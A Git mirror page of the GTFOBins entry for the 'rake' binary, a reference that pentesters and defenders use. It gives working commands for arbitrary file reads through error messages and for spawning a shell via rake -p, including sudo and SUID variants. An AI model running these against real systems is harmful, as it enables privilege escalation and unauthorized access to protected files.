This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-27 13:57:31 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
458b5d2b86b88572d7333f0a7e3dc60f4adcde96
GTFOBins.github.io
/
_gtfobins
/
rake.md
LinuxSploit
0b196471f8
Add rake file-read
...
Co-authored-by: Andrea Cardaci <
cyrus.and@gmail.com
>
2021-07-17 08:42:47 +02:00
352 B
Raw
Blame
History
functions
functions
file-read
shell
sudo
limited-suid
description
code
The file is actually parsed and the first wrong line is returned in an error message.
LFILE=file-to-read rake -f $LFILE
code
rake -p '`/bin/sh 1>&0`'
code
sudo rake -p '`/bin/sh 1>&0`'
code
./rake -p '`/bin/sh 1>&0`'
Reference in New Issue
View Git Blame
Copy Permalink